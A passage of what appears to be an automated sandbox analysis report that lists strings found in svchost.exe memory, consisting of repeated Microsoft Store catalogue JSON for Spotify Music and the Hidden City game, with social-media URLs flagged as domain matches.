music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-02-23T11:59:47.8037938Z||.||8febf963-d577-41c2-8ddb-3e5fa7b0157a||1152921505693219151||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000014.00000003.400693153.000002847D776000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-02-23T11:59:47.8037938Z||.||8febf963-d577-41c2-8ddb-3e5fa7b0157a||1152921505693219151||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000014.00000002.413767165.000002847D713000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000014.00000002.413767165.000002847D713000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                      Source: svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                      Source: svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                      Source: svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\